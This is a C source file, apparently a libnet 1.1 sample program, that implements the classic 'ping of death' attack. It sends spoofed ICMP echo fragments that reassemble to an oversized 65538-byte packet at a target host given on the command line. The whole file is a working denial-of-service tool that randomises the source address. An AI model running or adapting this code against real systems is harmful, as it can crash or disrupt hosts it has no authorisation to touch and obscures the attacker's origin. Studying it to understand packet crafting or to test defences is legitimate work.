/*
 *  $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $
 *
 *  libnet 1.1
 *  ICMP ping of death attack
 *
 *  Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
 *  All rights reserved.
 *
 *  Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org>
 *  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */

#if (HAVE_CONFIG_H)
#include "../include/config.h"
#endif
#include "./libnet_test.h"


#define FRAG_LEN    1472

int
main(int argc, char **argv)
{
    libnet_t *l;
    libnet_ptag_t ip;
    libnet_ptag_t icmp;
    struct libnet_stats ls;
    u_long fakesrc, target;
    u_char *data;
    int c, i, flags, offset, len;
    char errbuf[LIBNET_ERRBUF_SIZE];
  
    printf("libnet 1.1 Ping of Death[raw]\n"); 

    /*
     *  Initialize the library.  Root priviledges are required.
     */
    l = libnet_init(
            LIBNET_RAW4,                            /* injection type */
            NULL,                                   /* network interface */
            errbuf);                                /* errbuf */
 
    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
    {
        fprintf(stderr, "Usage: %s <target>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* get random src addr. */
    libnet_seed_prand(l);
    fakesrc = libnet_get_prand(LIBNET_PRu32);
  
    data = malloc(FRAG_LEN);
    for (i = 0 ; i < FRAG_LEN ; i++)
    {
        /* fill it with something */
        data[i] = 0x3a;
    }

    ip   = LIBNET_PTAG_INITIALIZER;
    icmp = LIBNET_PTAG_INITIALIZER;

    for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
    {
        offset = i;
        flags = 0;

        if (offset < 65120)
        {
            flags = IP_MF;
            len = FRAG_LEN;
        }
        else
        {
            /* for a total reconstructed length of 65538 bytes */
            len = 410;
        }

        icmp = libnet_build_icmpv4_echo(
            ICMP_ECHO,                                  /* type */
            0,                                          /* code */
            0,                                          /* checksum */
            666,                                        /* id */
            666,                                        /* sequence */
            data,                                       /* payload */
            len,                                        /* payload size */
            l,                                          /* libnet handle */
            icmp);                                      /* libnet ptag */
        if (icmp == -1)
        {
            fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
            goto bad;
        }
        /* no reason to do this */
        libnet_toggle_checksum(l, icmp, 0); 

        ip = libnet_build_ipv4(
            LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
            0,                                          /* TOS */
            666,                                        /* IP ID */
            flags | (offset >> 3),                      /* IP Frag */
            64,                                         /* TTL */
            IPPROTO_ICMP,                               /* protocol */
            0,                                          /* checksum */
            fakesrc,                                    /* source IP */
            target,                                     /* destination IP */
            NULL,                                       /* payload */
            0,                                          /* payload size */
            l,                                          /* libnet handle */
            ip);                                        /* libnet ptag */
        if (ip == -1)
        {
            fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
            goto bad;
        }

        c = libnet_write(l);
        if (c == -1)
        {
            fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        }

        /* tcpdump-style jonks. */
        printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
                argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
    }

    libnet_stats(l, &ls);
    fprintf(stderr, "Packets sent:  %lld\n"
                    "Packet errors: %lld\n"
                    "Bytes written: %lld\n",
                    ls.packets_sent, ls.packet_errors, ls.bytes_written);
    libnet_destroy(l);
    free(data);
    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    free(data);
    return (EXIT_FAILURE);
}

/* EOF */